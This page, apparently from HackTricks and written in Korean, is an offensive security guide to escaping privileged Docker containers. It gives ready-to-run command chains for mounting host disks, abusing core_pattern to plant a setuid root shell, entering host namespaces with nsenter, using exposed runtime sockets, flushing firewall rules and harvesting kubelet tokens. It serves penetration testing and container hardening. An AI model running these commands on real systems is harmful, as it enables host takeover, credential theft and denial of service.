`--privileged` 컨테이너에서 탈출하기

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

개요

--privileged로 시작한 컨테이너는 한두 개의 권한만 추가된 일반 컨테이너와 같지 않습니다. 실제로 --privileged는 일반적으로 워크로드가 위험한 호스트 자원에 접근하지 못하도록 막는 여러 기본 런타임 보호장치를 제거하거나 약화시킵니다. 정확한 효과는 여전히 런타임과 호스트에 따라 다르지만, Docker의 일반적인 결과는 다음과 같습니다:

모든 capabilities가 부여됩니다
device cgroup 제한이 해제됩니다
많은 커널 파일시스템이 더 이상 읽기 전용으로 마운트되지 않습니다
기본적으로 마스킹된 procfs 경로가 사라집니다
seccomp 필터링이 비활성화됩니다
AppArmor 격리가 비활성화됩니다
SELinux 격리가 비활성화되거나 훨씬 더 넓은 레이블로 대체됩니다

중요한 결과는 --privileged 컨테이너는 보통 미묘한 커널 익스플로잇을 필요로 하지 않는다는 점입니다. 많은 경우 호스트 디바이스, 호스트에 노출된 커널 파일시스템, 또는 런타임 인터페이스와 직접 상호작용한 뒤 호스트 쉘로 피벗할 수 있습니다.

`--privileged`가 자동으로 변경하지 않는 항목

--privileged는 자동으로 호스트 PID, network, IPC, 또는 UTS 네임스페이스에 조인하지는 않습니다. --privileged 컨테이너는 여전히 별도의 네임스페이스를 가질 수 있습니다. 즉, 일부 탈출 체인은 다음과 같은 추가 조건을 필요로 합니다:

호스트 bind mount
호스트 PID 공유
호스트 네트워킹
노출된 호스트 디바이스
쓰기 가능한 proc/sys 인터페이스

이러한 조건들은 실제 잘못된 설정에서 자주 쉽게 충족되지만, 개념적으로는 --privileged 자체와는 별개입니다.

탈출 경로

1. 노출된 디바이스를 통해 호스트 디스크 마운트하기

--privileged 컨테이너는 보통 /dev 아래에서 훨씬 더 많은 디바이스 노드를 볼 수 있습니다. 호스트 블록 디바이스가 보이는 경우, 가장 단순한 탈출 방법은 그것을 마운트하고 chroot로 호스트 파일시스템에 들어가는 것입니다:

ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null
mkdir -p /mnt/hostdisk
mount /dev/sda1 /mnt/hostdisk 2>/dev/null || mount /dev/vda1 /mnt/hostdisk 2>/dev/null
ls -la /mnt/hostdisk
chroot /mnt/hostdisk /bin/bash 2>/dev/null

루트 파티션이 명확하지 않으면, 먼저 블록 레이아웃을 열거하세요:

fdisk -l 2>/dev/null
blkid 2>/dev/null
debugfs /dev/sda1 2>/dev/null

실제 상황에서 chroot 대신 쓰기 가능한 호스트 마운트에 setuid helper를 심는 것이 현실적인 경로라면, 모든 파일시스템이 setuid bit를 존중하는 것은 아니라는 점을 기억하라. 간단한 호스트 측 권한 확인 방법은 다음과 같다:

mount | grep -v "nosuid"

이것이 유용한 이유는 nosuid 파일시스템 아래의 쓰기 가능한 경로가 전통적인 “drop a setuid shell and execute it later” 워크플로에서는 훨씬 덜 흥미롭기 때문입니다.

여기서 악용되는 완화된 보호 메커니즘은 다음과 같습니다:

전체 디바이스 노출
광범위한 capabilities, 특히 CAP_SYS_ADMIN

2. Mount Or Reuse A Host Bind Mount And `chroot`

호스트 루트 파일시스템이 이미 컨테이너 내부에 마운트되어 있거나, 컨테이너가 권한이 높아 필요한 마운트를 생성할 수 있다면, 호스트 셸은 종종 단 하나의 chroot만큼 떨어져 있습니다:

mount | grep -E ' /host| /mnt| /rootfs'
ls -la /host 2>/dev/null
chroot /host /bin/bash 2>/dev/null || /host/bin/bash -p

호스트 루트 bind mount가 없지만 호스트 스토리지에 접근할 수 있다면, 하나를 생성하세요:

mkdir -p /tmp/host
mount --bind / /tmp/host
chroot /tmp/host /bin/bash 2>/dev/null

이 경로는 다음을 악용합니다:

weakened mount restrictions
full capabilities
lack of MAC confinement

3. 쓰기 가능한 `/proc/sys` 또는 `/sys` 악용

--privileged의 큰 결과 중 하나는 procfs와 sysfs에 대한 보호가 훨씬 약해진다는 것입니다. 이는 일반적으로 마스킹되거나 read-only로 마운트된 호스트 대상의 kernel interfaces를 노출시킬 수 있습니다.

대표적인 예는 core_pattern입니다:

[ -w /proc/sys/kernel/core_pattern ] || exit 1
overlay=$(mount | sed -n 's/.*upperdir=\([^,]*\).*/\1/p' | head -n1)
cat <<'EOF' > /shell.sh
#!/bin/sh
cp /bin/sh /tmp/rootsh
chmod u+s /tmp/rootsh
EOF
chmod +x /shell.sh
echo "|$overlay/shell.sh" > /proc/sys/kernel/core_pattern
cat <<'EOF' > /tmp/crash.c
int main(void) {
char buf[1];
for (int i = 0; i < 100; i++) buf[i] = 1;
return 0;
}
EOF
gcc /tmp/crash.c -o /tmp/crash
/tmp/crash
ls -l /tmp/rootsh

다른 고가치 경로에는 다음이 포함됩니다:

cat /proc/sys/kernel/modprobe 2>/dev/null
cat /proc/sys/fs/binfmt_misc/status 2>/dev/null
find /proc/sys -maxdepth 3 -writable 2>/dev/null | head -n 50
find /sys -maxdepth 4 -writable 2>/dev/null | head -n 50

이 경로는 다음을 악용합니다:

missing masked paths
missing read-only system paths

Masked Paths

Read Only Paths

4. Mount- 또는 Namespace 기반 Escape를 위해 Full capabilities 사용

privileged container는 표준 컨테이너에서 보통 제거되는 capabilities(예: CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_SYS_MODULE, CAP_NET_ADMIN 등)를 얻습니다. 다른 노출된 표면이 존재하면 이는 로컬 foothold를 host escape로 전환하기에 충분한 경우가 많습니다.

간단한 예로 추가 파일시스템을 mount하고 namespace entry를 사용하는 경우가 있습니다:

capsh --print | grep cap_sys_admin
which nsenter
nsenter -t 1 -m -u -n -i -p sh 2>/dev/null || echo "host namespace entry blocked"

호스트 PID도 공유되어 있다면, 이 단계는 훨씬 짧아집니다:

ps -ef | head -n 50
nsenter -t 1 -m -u -n -i -p /bin/bash

이 경로는 다음을 악용합니다:

기본 privileged capability 세트
선택적 호스트 PID 공유

Capabilities

PID Namespace

5. 런타임 소켓을 통한 탈출

A privileged container는 종종 호스트의 런타임 상태나 소켓이 노출됩니다. Docker, containerd, CRI-O 소켓에 접근할 수 있다면, 가장 단순한 방법은 runtime API를 사용해 호스트 접근 권한이 있는 두 번째 컨테이너를 실행하는 것입니다:

find / -maxdepth 3 \( -name docker.sock -o -name containerd.sock -o -name crio.sock \) 2>/dev/null
docker -H unix:///var/run/docker.sock run --rm -it -v /:/mnt ubuntu chroot /mnt bash 2>/dev/null

containerd의 경우:

ctr --address /run/containerd/containerd.sock images ls 2>/dev/null

이 경로는 다음을 악용합니다:

privileged runtime exposure
host bind mounts created through the runtime itself

6. 네트워크 격리 부작용 제거

--privileged 자체만으로는 호스트 네트워크 네임스페이스에 참여하지 않지만, 컨테이너에 --network=host 또는 다른 호스트-네트워크 접근 권한이 있는 경우 전체 네트워크 스택이 변경 가능해집니다:

capsh --print | grep cap_net_admin
ip addr
ip route
iptables -S 2>/dev/null || nft list ruleset 2>/dev/null
ip link set lo down 2>/dev/null
iptables -F 2>/dev/null

항상 직접적인 호스트 셸을 얻는 것은 아니지만, denial of service, traffic interception, 또는 loopback-only 관리 서비스 접근을 초래할 수 있다.

7. 호스트 비밀 및 런타임 상태 읽기

즉시 clean shell escape가 이루어지지 않더라도, privileged containers는 종종 host secrets, kubelet state, runtime metadata, 및 인접 컨테이너 파일시스템을 읽을 수 있는 충분한 접근 권한을 가진다:

find /var/lib /run /var/run -maxdepth 3 -type f 2>/dev/null | head -n 100
find /var/lib/kubelet -type f -name token 2>/dev/null | head -n 20
find /var/lib/containerd -type f 2>/dev/null | head -n 50

/var가 호스트에 마운트되어 있거나 런타임 디렉터리가 노출되어 있으면, 호스트 셸을 확보하기 전에조차 lateral movement 또는 cloud/Kubernetes credential theft에 충분할 수 있습니다.

Mount Namespace

Sensitive Host Mounts

확인

다음 명령의 목적은 어떤 privileged-container escape families가 즉시 실행 가능한지 확인하는 것입니다.

capsh --print                                    # Confirm the expanded capability set
mount | grep -E '/proc|/sys| /host| /mnt'        # Check for dangerous kernel filesystems and host binds
ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null   # Check for host block devices
grep Seccomp /proc/self/status                   # Confirm seccomp is disabled
cat /proc/self/attr/current 2>/dev/null          # Check whether AppArmor/SELinux confinement is gone
find / -maxdepth 3 -name '*.sock' 2>/dev/null    # Look for runtime sockets

여기서 주목할 점:

전체 권한 세트, 특히 CAP_SYS_ADMIN
쓰기 가능한 proc/sys 노출
노출된 호스트 장치
seccomp 및 MAC 격리 없음
runtime sockets 또는 host root bind mounts

이 항목들 중 하나만으로도 post-exploitation에 충분할 수 있습니다. 여러 항목이 함께 있으면 일반적으로 컨테이너는 기능적으로 한두 개의 명령으로 host compromise에 이를 수 있습니다.

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.